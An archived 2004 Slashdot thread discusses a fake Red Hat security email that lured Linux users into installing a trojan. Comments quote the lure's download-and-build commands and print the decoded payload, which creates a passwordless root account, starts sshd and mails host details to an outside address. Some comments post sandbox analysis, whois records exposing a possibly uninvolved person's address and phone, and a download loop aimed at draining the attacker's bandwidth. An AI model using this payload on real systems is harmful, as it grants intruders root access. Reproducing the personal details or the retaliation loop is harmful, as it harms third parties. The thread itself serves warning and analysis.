Forgot your password?
typodupeerror
Security Businesses Red Hat Software Software IT Linux

Beware 'Fedora-Redhat' Fake Security Alert 628

Posted by timothy
from the don't-get-took dept.
rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.
This discussion has been archived. No new comments can be posted.

Beware 'Fedora-Redhat' Fake Security Alert

Comments Filter:
  • text of site (Score:5, Informative)

    by Anonymous Coward on Sunday October 24, 2004 @08:55PM (#10617041)
    Original issue date: October 20, 2004
    Last revised: October 20, 2004
    Source: RedHat

    A complete revision history is at the end of this file.

    Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

    The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

    * First download the patch from the Stanford RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz or directly here.
    * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
    * cd fileutils-1.0.6.patch
    * make
    * ./inst

    Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com

    Thank you for your prompt attention to this serious matter,

    RedHat Security Team.

    Copyright © 2004 Red Hat, Inc. All rights reserved.
    • Re: text (Score:5, Insightful)

      by Inf0phreak (627499) on Sunday October 24, 2004 @09:09PM (#10617145)
      Why post the text instead of having the /. crowd flood their server to see what they've put up there? Potentially that could bring the server offline and cost them a bundle for a great two-sided effect (OK, the latter is not that cool if it's just some rooted box, but at least it would prevent anyone being affected if it was /.'ed to hell).
    • by Nailer (69468) on Sunday October 24, 2004 @09:19PM (#10617207)
      The domain name was a good start, but these kids will have a hard time fooling anyone since they've ignored most of the basics:

      • Most users who install security upgrades won't be running Red Hat 7.x.
      • Red Hat is two words. Both begin with capitals.
      • Red Hat use packages. Not hard guys.
      • Security updates are provided through up2date. If they were smart, they would have provided an up2date source to use.
      • The exclamation marks in 'Apply this patch!' seem a little un vendor-like
    • by justforaday (560408) on Sunday October 24, 2004 @09:26PM (#10617253)
      Thanks for posting that! Whew, I sure am glad I managed to get that patch installed before anyone was able to take over my system...
    • Re:text of site (Score:4, Interesting)

      by MBCook (132727) <foobarsoft@foobarsoft.com> on Sunday October 24, 2004 @09:28PM (#10617262) Homepage
      Anyone who reads this and isn't instantly suspicious needs to up their paranoia level. Look at all the mistakes in the grammar! "Redhat found...". If this was from RedHat it would be "Redhat has found" or "We found" or "It has come to our attention" or something like that. "Some of the effected distriubtions include..." should be something more like "RedHat 7.2 and newer are effected" or some such. It would not end in "and not only" (which is terrible English, probably supposed to be "and more"). Plus why would a RedHat security advisory inform people if Solaris or *BSD was effected? I would expect that a link would be given to more information about the vulnerability (not just "see redhat.com" which is basically what's there). Last but not least, what has been RedHat all thoughout the advisory becomes "Red Hat" in the last line.

      Beyond those obvious problems, the "best" targets of something like this (businesses) would have people who know better than this. Those people would know how a patch file would work. At miniumum the "./inst" section should say "make install", which is much more common. So this would only effect the "newbie" Linux user. Last of all, I would expect that anything RedHat issued would say something like "or get the update through Red Carpet (or whatever their 'Windows Update' is called)".

      This isn't a very well made forgery. They could have easily taken a true RedHat advisory and modified it so the language would be better and sound more plausable. They could have at LEAST gotten someone who knows English better.

      Does anyone else find it strange someone would go through all the trouble of registering a domain-name to run this scam? Why not say "download it off the (such and such) mirror at ftp://120.584.391.568/pub/mirror/redhat/patches/pa tch_file.tar.gz" or something like that. Use any domain name and make it look like a mirror. When was the last time any company put a file for users at "(domainname).com/file.tar.gz"? Never.

      Most people could have done better, IMHO.

  • by Orgazmus (761208) on Sunday October 24, 2004 @08:55PM (#10617044)
    Adopting dumb users had to bring the ones exploiting the stpidity with them. Even tho running as a non-admin should help againts these things, there is no cure against security holes between the chair and the keyboard.
    • by Stevyn (691306) on Sunday October 24, 2004 @08:57PM (#10617054)
      I wouldn't worry, they're probably on the forums trying to find the command to install it.

    • by antoy (665494) <alexis@then3.1415926ull.net minus pi> on Sunday October 24, 2004 @09:38PM (#10617321)
      Yes, but when this kind of thing happened on Windows, it was Windows' fault for not having the proper security mechanisms to stop it. The difference is that Windows will set up all users as administrators, true, but running as a plain user can be very bad too. The fact is, neither of the OSes provides (by default, at least) substantial protection from such attacks.

      Allowing only registered executables to run could be set up to prevent such things. Microsoft signs their patches and programs too, but no regular user will ever check.

      Incorporate such functions in the OS or GUI. Harass the user whenever an executable or shared library is introduced to the system: "Here are the certifications, do you trust this?"

      Limiting permissions up to the user level is not enough anymore: VM based environments such as Java and .NET have program/assembly-based security systems. But although the technology exists, it is very poorly handled, at least in the .NET front where I am experienced: There is no simple wizard to set up settings the way you want them, there is no popup dialog asking you how much you trust this executable and which permissions it should get. Such technology could go a long way in preventing such ridiculously simple attacks from succeeding in the future.

      First time I saw a similar feature was in Kerio Personal Firewall, which would ask everytime a new program would attempt to connect somewhere, or have something connect to a port it opened. It was simple and effective, and the 'harassment' was more than worth it (SP2 does something similar, but it's flawed*).

      In conclusion. I want to say that I believe if all people had:

      1) Startup Monitor [mlin.net] - Painfully simple, no one should be without it.
      2) Kerio Personal Firewall [kerio.com], or equivalent
      3) An executable monitor as described above.
      ,the *real* reasons for Windows' pathetic security record would be no more. Never mind those vulnerabilities: I could give you a .exe that would delete all your documents, and you have but to click on it (I swear it decrypts HL2 from the Steam files :-) The same, of course, applies to Linux.


      * SP2 tells you when an executable tries to connect, and waits for you to decide if you want to block it, but it *does* allow the connection to work until you decide what to do with it. Furthermore, I'm not sure if it can tell if an executable was replaced with a compromised version (Kerio has MD5 hashes)
      • > In conclusion. I want to say that I believe
        > if all people had:
        >
        > 1) Startup Monitor - Painfully simple, no one
        > should be without it.

        I use startup monitor. It is good. The problem is that the vast majority of Windows users are so habitualised into clicking 'YES' all the time that nasties will often get installed anyway.

        Malware: Do you want to install this nasty browser hijacker?

        n00b: Yes, just give me my goddamn "tropical aquarium" screensaver already!

        > 2) Kerio Personal Firewall, o
    • by DissidentHere (750394) on Sunday October 24, 2004 @10:47PM (#10617716) Homepage Journal
      Why would anyoen even bother trying this kind of cheap social engineering with Linux users at this point. What /. reader would actually fall for this shit? We all make fun of security through obscurity, but *nix users also tend to have security through intelligence.

      Here is where the real danger lies, getting Linux on the desktop and having your grandma fall for this type of tripe, it will give *nix a bad name. "Oh no, Linux is just as vulnerable as Windows" No - its the users that are vulnerable, and the users that need to be educated. We all do what we can to lock down our boxen, but in the end it too often comes down to what's between the chair and the keyboard.
      • You have got to be kidding me.

        While I'm not intending to insult anyone's intelligence here, /. is a large group and some pay more attention to security and these kinds of attacks than others. Not to mention, too many people visit here to have "probability = 0" be a realistic assessment.

        'Grandma' should never be in the position to install software, IMO. I've been talking to my grandmother about a linux installation for a while, and I will hold 'the keys' and help her out via ssh. As she's pretty set in her
  • About Time (Score:4, Insightful)

    by Mr. Arbusto (300950) <.moc.liamg. .ta. .kcuhcemirpeht.> on Sunday October 24, 2004 @08:55PM (#10617045) Journal
    It's fishing, it happens on every platform and requires the user to do something they think is in their best interest. Nothing new.
  • I'll try it... (Score:5, Interesting)

    by enginuitor (779522) <Greg_Courville@nOSpam.GregLabs.com> on Sunday October 24, 2004 @08:56PM (#10617048) Homepage
    I am downloading the file to a Knoppix box, and will then disconnect the ethernet cord, run the code, and report back.

    Stay tuned.
    • Re:I'll try it... (Score:5, Informative)

      by damiam (409504) on Sunday October 24, 2004 @09:01PM (#10617096)
      Make sure you use a chroot jail; Knoppix can still write to your hard drive.
    • Identifying the system. This may take up to 2 minutes. Please wait...
      adduser: No more than two names.
      passwd: Unknown user bash
      Could not load host key: /etc/ssh/ssh_host_key
      Could not load host key: /etc/ssh/ssh_host_rsa_key
      Could not load host key: /etc/ssh/ssh_host_dsa_key
      Disabling protocol version 1. Could not load host key.
      Disabling protocol version 2. Could not load host key.
      sshd: no hostkeys available -- exiting.
      System looks OK. Proceeding to next step.

      Patching "ls": ###########
      Patching "mkdir": ##########

      System updated and secured successfully. You may erase these files.
    • Re:I'll try it... (Score:5, Informative)

      by eakerin (633954) on Sunday October 24, 2004 @09:13PM (#10617172) Homepage
      Well I downloaded it, and uncompressed it.

      There are 3 files:
      fileutils-patch.bin
      inst.c
      Makefile

      fileutils-patch.bin is an rpm with an incorrect extension, but it's valid. And an actual RPM from redhat (verified the GPG signature) Probably just put there to make it look bigger, and have something that came from redhat.

      Well I was gonna put the package header information here, but slashcode didn't like it.

      Signature verification using "rpm --checksig fileutils-patch.bin"
      fileutils-patch.bin: (sha1) dsa sha1 md5 gpg OK
    • Re:I'll try it... (Score:5, Informative)

      by superpeach (110218) <adamf@s[ ]a.uklinux.net ['nik' in gap]> on Sunday October 24, 2004 @09:19PM (#10617204) Homepage
      I just looked at inst.c and changed it a bit to print what it runs instead of running it. Looks like a shell script hidden in some C (using shc, http://www.datsi.fi.upm.es/~frosal/sources/shc.htm l )

      The working bit of the script is:

      echo "Inca un root frate belea: " >> /tmp/mama
      adduser -g 0 -u 0 -o bash >> /tmp/mama
      passwd -d bash >> /tmp/mama
      ifconfig >> /tmp/mama
      uname -a >> /tmp/mama
      uptime >> /tmp/mama
      sshd >> /tmp/mama
      echo "user bash stii tu" >> /tmp/mama
      cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
      rm -rf /tmp/mama

      So, adds a user called bash with root privs, starts sshd and emails your IP address to someone.

      • Re:I'll try it... (Score:5, Informative)

        by aredubya74 (266988) on Sunday October 24, 2004 @09:47PM (#10617371)
        Assuming (yeah, I know, big assumption) the whois info is relatively accurate, we may have an idea as to at least next step in the chain of figuring out the culprit, output of whois addlebrain.com:

        Registration Service Provided By: StoreIQ, Inc.
        Contact: technical@storeiq.com
        Visit:

        Domain name: addlebrain.com

        Registrant Contact:
        ABM Wireless
        Domain Administrator (administrator@buywirelessdirect.com)
        +1.7323331100
        Fax: +1.NA
        3587 US Highway 9 #132
        Freehold, NJ 07728
        US

        Administrative Contact:
        ABM Wireless
        Domain Administrator (administrator@buywirelessdirect.com)
        +1.7323331100
        Fax: +1.NA
        3587 US Highway 9 #132
        Freehold, NJ 07728
        US

        Technical Contact:
        ABM Wireless
        Domain Administrator (administrator@buywirelessdirect.com)
        +1.7323331100
        Fax: +1.NA
        3587 US Highway 9 #132
        Freehold, NJ 07728
        US

        Billing Contact:
        ABM Wireless
        Domain Administrator (administrator@buywirelessdirect.com)
        +1.7323331100
        Fax: +1.NA
        3587 US Highway 9 #132
        Freehold, NJ 07728
        US

        Status: Locked

        Name Servers:
        dns1.name-services.com
        dns2.name-services.com
        dns3.name-services.com
        dns4.name-services.com
        dns5.name-services.com

        The same address is used for two associated domains, buywirelessdirect.com (the email addy for this domain's tech contact) and storeiq.com (the email addy for buywirelessdirect.com's tech contact). The area code is accurate for that neck of the woods too, though I haven't tried the phone number (yet):

        StoreIQ, Inc.
        John Thompson (technical@storeiq.com)
        +1.7323331145
        Fax:
        3587 US Highway 9 #213
        Freehold, NJ 07728
        US
    • I love it! (Score:5, Funny)

      by jd (1658) <.imipak. .at. .yahoo.com.> on Sunday October 24, 2004 @10:03PM (#10617472) Homepage Journal
      Linux geek comes across an obvious trojan. What does said geek do? E-mail the site admin? DoS the source site? Noooooo. They set up a sandbox environment and run it, to see what happens!


      (Mind you, I'm no better. First time I got a computer virus, when I was running MSDOS, my first reaction was to run a binary diff against a clean version of the file, and disassemble the result to see what it did. Do you know if there's a cure for this?)

      • Re:I love it! (Score:3, Insightful)

        by juhaz (110830)
        Do you know if there's a cure for this?

        A cure for what? Human curiosity? Why on Earth would anyone want to be "cured" from that, and become something less instead. It's one of the few good qualities that have brought us so far despite our lacking on other important areas...

        On computer geeks, need to know how things work naturally becomes directed towards computers...
      • Re:I love it! (Score:4, Insightful)

        by Tony-A (29931) on Sunday October 24, 2004 @11:58PM (#10618036)
        Do you know if there's a cure for this?

        You don't want a cure for this.

        If you want a legitimate comparison between Linux and Windows security, observe:

        This is new and fresh enough to "set up a sandbox environment and run it, to see what happens!" Another Windows similar thingee, "been there done that".

        Dated 23rd October 2004 on http://www.redhat.com/security/ which means that Red Hat was on top of it fast. This isn't the kind of thing that Slashdot sits on and Red Hat was one day plus ahead. For comparison, it took about 6 days for Microsoft to return anything about Code Red on a search from microsoft.com. That's 6 days after appearing on Slachdot (compared to 1 day before).

      • Marriage.
  • wont work (Score:3, Insightful)

    by Anonymous Coward on Sunday October 24, 2004 @08:57PM (#10617052)
    Don't most Fedora people use yum to keep their systems up to date? I don't think many Fedora/Red Hat admins would fall for this.
  • by SIGBUS (8236) on Sunday October 24, 2004 @08:57PM (#10617056) Homepage
    [Querying whois.internic.net]
    [Redirected to whois.melbourneit.com]
    [Querying whois.melbourneit.com]
    [whois.melbourneit.com]

    Domain Name.......... fedora-redhat.com
    Creation Date........ 2004-10-24
    Registration Date.... 2004-10-24
    Expiry Date.......... 2005-10-24
    Organisation Name.... Raymond Jackson
    Organisation Address. 224 Cedar Avenue
    Organisation Address.
    Organisation Address. New York
    Organisation Address. 95301
    Organisation Address. NY
    Organisation Address. UNITED STATES

    Admin Name........... Raymond Jackson
    Admin Address........ 224 Cedar Avenue
    Admin Address........
    Admin Address........ New York
    Admin Address........ 95301
    Admin Address........ NY
    Admin Address........ UNITED STATES
    Admin Email.......... rayjackson23@yahoo.com
    Admin Phone.......... +1.2098994533
    Admin Fax............

    Tech Name............ YahooDomains TechContact
    Tech Address......... 701 First Ave.
    Tech Address.........
    Tech Address......... Sunnyvale
    Tech Address......... 94089
    Tech Address......... CA
    Tech Address......... UNITED STATES
    Tech Email........... domain.tech@YAHOO-INC.COM
    Tech Phone........... +1.6198813096
    Tech Fax............. +1.6198813010
    Name Server.......... yns1.yahoo.com
    Name Server.......... yns2.yahoo.com
    • by barzok (26681)
      95301 is Atwater, CA. There are at least 2 Cedar Avenues in NY (Staten Island and The Bronx), and one in Atwater.
    • However, the IP block clearly belongs to Yahoo, whois 66.218.75.0 lists contact point netblockadmin@yahoo-inc.com [mailto]

      Anybody feel like dropping them a line to tell them they're hosting trojaners?

    • by bconway (63464) *
      Don't forget the domain that the script emails, root@addlebrain.com:

      Found a referral to whois.enom.com.

      Registration Service Provided By: StoreIQ, Inc.
      Contact: technical@storeiq.com
      Visit:

      Domain name: addlebrain.com

      Registrant Contact:
      ABM Wireless
      Domain Administrator (administrator@buywirelessdirect.com)
      +1.7323331100
      Fax: +1.NA
      3587 US Highway 9 #132
      Freehold, NJ 07728
      US

      Administrative Contact:
      ABM Wireless
      Domain Administrator (administrator@buywirelessdirect.com)
      +1.7323
      • by Anonymous Coward on Sunday October 24, 2004 @09:42PM (#10617352)
        Don't forget the domain that the script emails, root@addlebrain.com

        Sorry to dissapoint you, but I doubt he owns the domain - they offer free webmail, so it's likely he just signed up for an account. Presumably they didn't stop anyone from getting the username 'root' - I signed up for 'administrator' just now (password 'monkey' if you don't believe me) with no problems.
    • There IS a Raymond Jackson that lives at that address (except that it's in CA rather than NY, as has been previously noted) so it's not completely made up. Although, whether he's really the perpetrator or simply someone the real criminal doesn't get on with is still a matter of doubt. In any case, all his details (including e-mail address and phone number) can be easily found from a Google search - he runs a chapter of a Historical Minatures Gaming Society [hmgs.org] in his area (HMGS West, near the bottom of the pag
  • Real link? (Score:5, Insightful)

    by chrispyman (710460) on Sunday October 24, 2004 @08:58PM (#10617061)
    Why not just use the real link and slashdot their site into oblivion!
    • Re:Real link? (Score:4, Informative)

      by crow (16139) on Sunday October 24, 2004 @09:26PM (#10617247) Homepage Journal
      It looks like it's probably hosted by Yahoo!
      traceroute www.fedora-redhat.com
      traceroute: Warning: www.fedora-redhat.com has multiple addresses; using 66.218.79.149
      traceroute to premium4.geo.yahoo.akadns.net (66.218.79.149), 30 hops max, 38 byte packets
      I'm getting about 3MB/s right now. We won't slashdot the server, but we may well use up the bandwidth quota that this person bought.
      • Re:Real link? (Score:3, Interesting)

        by acidblood (247709)
        This seems like a very good idea. Normally I wouldn't be for vigilante justice, but this guy deserves it.

        I'm running the following script on my box, and I recommend others to do the same.

        while true; do wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz ; rm fileutils-1.0.6.patch.tar.gz; done

        If enough people do the same, either the site is taken offline, or we're gonna cost him a pretty penny.
  • by LostCluster (625375) * on Sunday October 24, 2004 @08:58PM (#10617063)
    Red Hat's reply to this issue is pretty straight-forward. They've already taken all of the steps to properly sign their real updates, and this should stand out as a fake because it lacks all of those digital signatures.

    However, what good is that against Joe User who falls for the bait and things the e-mail is authentic because they believe everything they read on their screen? They don't know to check for the "security seals" and since they don't see any red flags indicating that this is bogus.

    It's something in info security that disconnects when dealing with average users. They don't know what to look for, and therefore the absense of those marks is not alarming to them as it is for us... a little something that needs to be cleaned up before Linux is ready for desktop primetime.
  • Stupid Tricks? (Score:5, Interesting)

    by dj_cel (744926) on Sunday October 24, 2004 @08:58PM (#10617073)
    It seems to me that most people using any version of Linux will not fall victim to these sorts of things. I would expect something like this to work for the majority of windows users, but as the audience of Linux is mostly tech-savy, I can't see this becoming a problem. The problem is going to be when larger groups of desktop users make the jump to Linux. What can be done to prevent this from happening in the future? What failsafes can be built into Linux to prevent people with less than average pc skills from destroying their systems?
  • by Mentorix (620009) <slashdot@benben.com> on Sunday October 24, 2004 @08:59PM (#10617079)
    Running untrusted code can result in system compromise.

    Everyone checks the gpg signatures right?
  • by JamesTRexx (675890) <m.nystrom@m b i t z . nl> on Sunday October 24, 2004 @09:01PM (#10617093) Homepage Journal
    Now if each time when someone tries this sort of thing gets their server posted here on slashdot, we could actually do something good with the slashdot effect and put their server up in smoke before much damage is done. :-D
  • Confidence (Score:3, Insightful)

    by FiReaNGeL (312636) <<moc.liamtoh> <ta> <l3gnaerif>> on Sunday October 24, 2004 @09:04PM (#10617111) Homepage
    OK, we all know no Linux Guru will ever fall for this kind of stupid trick.

    But imagine a world where Linux overwhelms Microsoft as the #1 desktop OS. Millions of Moms and Pops everywhere, using Linux. Who will they trust for their "updates"? I know for sure lots of them would fall for this particular trick, and it`s one of the first time we see this. Lots of distros, lots of sources, lots of patches, major confusion.

    Question (as I don`t use Linux yet) : Do some of the major distros (Redhat, etc) have a webservice for updates, akin to windowsupdate.com? I sure hope so; it`s essential for further desktop market share increase.
    • Re:Confidence (Score:3, Informative)

      by dtfinch (661405) *
      Do some of the major distros (Redhat, etc) have a webservice for updates, akin to windowsupdate.com? I sure hope so; it`s essential for further desktop market share increase.

      For the most part, they all do, even most of the little ones. Typing "yum -y update" at the command line keeps me up to date, or I could enable the cron job to do it automatically each night.
  • PHEW! (Score:5, Funny)

    by big daddy kane (731748) on Sunday October 24, 2004 @09:10PM (#10617150)
    I'm sure glad I'm using windows!
  • by cranos (592602) on Sunday October 24, 2004 @09:12PM (#10617160) Homepage Journal
    Dammit why does Linux have to be so complicated, I mean damn you have to compile your own viruses and everything!!!!

  • by taubz (322102) on Sunday October 24, 2004 @09:15PM (#10617177) Homepage

    If your mail client checked From: addresses against SPF records in DNS, you'd know immediately this was a hoax. Redhat.com fortunately publishes SPF records and -- score one for SPF -- they can be used to identify with 100% accuracy that the mail is not legitimate.

    How can you get your mail client to check SPF records automatically? Download the Thunderbird SPF Extension [for.net].

    (Disclosure: I wrote the plugin. :) )

    • I don't see the original email, but I'd bet that it came from something@fedora-redhat.com, and so the SPF record for redhat.com would not have been useful in this case. :)

      On another note, concerning your SPF plugin: I have two points you may wish to consider (if you already have, then fair enough).

      1. The From address used by the plugin comes from the From: header in the message? I thought you're not supposed to do this with SPF; it specifies that you should check the SMTP envelope sender (the MAIL FROM line from the SMTP dialogue). This information is not available to a MUA in any standard form AFAIK.

      2. What happens if I open a message I stored from a few months/years ago, and the SPF record for the domain it's from has changed? Does the plugin validate a message whenever one is opened, and will I end up with a false positive/negative?

      I believe these two issues are why SPF checking must be performed on the server side. The mail server alone has reliable access to the SMTP envelope sender, and can add a Recieved-SPF header at the time of message reception, which is the only time when it is guaranteed that the SPF records from DNS are relevant to the message in question.

      SPF done on the client side basically turns into MICROS~1's (patented, if you believe that they'll allow crap like this to be patented!) Sender-ID system, where the From address is taken from a seletion of message headers.

      Of course, if I'm wrong about any of this, please correct me. :)
    • This is misleading. SPF might help verify that this email didn't come from redhat.com, but SPF isn't going to help you in general:
      • The envelope sender could have not been @redhat.com but the From field could have contained redhat.com; then, there is no SPF to check and you can't benefit from redhat's SPF record
      • The sender could have used a fedora-redhat.com address and published an SPF record for their own domain. Spammers already do this. The SPF check tells you nothing about authenticity. The SPF check
    • How do we know this isn't a trojan ;)
  • by monoi (811392) on Sunday October 24, 2004 @09:15PM (#10617182)
    Anybody running RedHat and Fedora are strongly adviced to apply this patch!

    But I am running SUSE! Am I adviced in similar fashion? Perhaps I too should applying patch lest SUSE found vulnerability also? Thankyou to www.fedora-redhat.com for adviced me in this helpful manner against remote attackers!

  • by RedPhoenix (124662) on Sunday October 24, 2004 @09:27PM (#10617256)
    The source code for inst.c seems to be very similar to the "Klik client" code from http://klik.berlios.de/client/klik-0.1.3.c

    Everything but the comments at the top of the page, and the shellcode, is pretty-much identical.

    Klik looks to be a "KDE-based Live Installer for Knoppix".

    Still looking....

    Red.
    • Ok, see superpeach's post above - both klik, and this, use a bit of code that includes shell script in a C program:
      http://www.datsi.fi.upm.es/~frosal/sourc es/shc.htm l

      Red.
  • Stupidity (Score:3, Funny)

    by enginuitor (779522) <Greg_Courville@nOSpam.GregLabs.com> on Sunday October 24, 2004 @09:30PM (#10617277) Homepage
    The funniest part is that the code (a shell script compiled into C code, then into a binary, to obfuscate its purpose) failed miserably on my test systems, both Knoppix AND Fedora Core 2. It spat out a bunch of errors which completely revealed the fact that it was trying to add a user, start sshd, etc. C'mon, if you're gonna terrorize the Linux world, at least do it right!
  • contact yahoo (Score:4, Informative)

    by Anonymous Coward on Sunday October 24, 2004 @09:37PM (#10617313)
    Everyone should email yahoo via netblockadmin@yahoo-inc.com and ask them to take the site down.
  • Checksum (Score:4, Funny)

    by jesser (77961) on Sunday October 24, 2004 @09:37PM (#10617318) Homepage Journal
    >md5sum fileutils-1.0.6.patch.tar.gz

    68349c219d941209af8f7c968b89d622 *fileutils-1.0.6.patch.tar.gz

    So you can be sure you're getting the real fake patch.
  • by Zocalo (252965) on Sunday October 24, 2004 @09:48PM (#10617385) Homepage
    This hit the SpamAssassin mailling list a couple of days ago, the only difference is the location of the file which might help explain the Stanford reference. In the original the line was:

    wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar. gz
    but now it's:
    wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz

    Whoever is behind this certainly seems to be doing a very sloppy job of it. Yahoo, Melbourne IT, Stanford, hosting at "everyone.net"; hardly a who's who of dodgy companies and "bullet proof" service providers, is it? Frankly, I'm expecting to be reading a Slashdot story about a bust by the end of the week, and that's being generous.

  • To : abuse@everyone.net,
    abuse@above.net
    Subject : malware using your netblock to propagate

    http://it.slashdot.org/article.pl?sid =04/10/24/2352234&tid=172&tid=110&tid=218&tid=106

    The story reports on a linux trojan that, after installing, emails a
    report back to root@addlebrain.com. The MX record for addlebrain.com
    points to sitemail.everyone.net. It would reduce the effect of this if
    you could shut down that email account.

    Better yet, you should gather the list of infected IPs and then inform
    the owners.

    Damian Menscher
    --
    -=#| Physics Grad Student & SysAdmin @ U Illinois Urbana-Champaign |#=-
    -=#| 488 LLP, 1110 W. Green St, Urbana, IL 61801 Ofc:(217)333-0038 |#=-
    -=#| 4602 Beckman, VMIL/MS, Imaging Technology Group:(217)244-3074 |#=-
    -=#| <menscher@uiuc.edu> www.uiuc.edu/~menscher/ Fax:(217)333-9819 |#=-
    -=#| The above opinions are not necessarily those of my employers. |#=-
  • From the WHOIS: (Score:3, Informative)

    by Anonymous Coward on Sunday October 24, 2004 @11:19PM (#10617870)
    I looked at the whois... fedora-redhat.com reported:

    Raymond Jackson
    224 Cedar Avenue
    New York, NY 95301.
    209 899-4533 However, 95301 is an Atwater, CA zip code.

    So, I looked up Raymond Jackson in Atwater. What did I find?


    Raymond Jackson
    224 Cedar Avenue
    Atwater, CA 95301
    209 358 8510.

    Looks like he did a crappy job of disguising his identity. Go get him!!!
  • by moyix (412254) on Sunday October 24, 2004 @11:47PM (#10617995) Homepage
    Someone on the full-disclosure has posted a good analysis of what this is. Have a look at this thread [netsys.com].

Lend money to a bad debtor and he will hate you.

Working...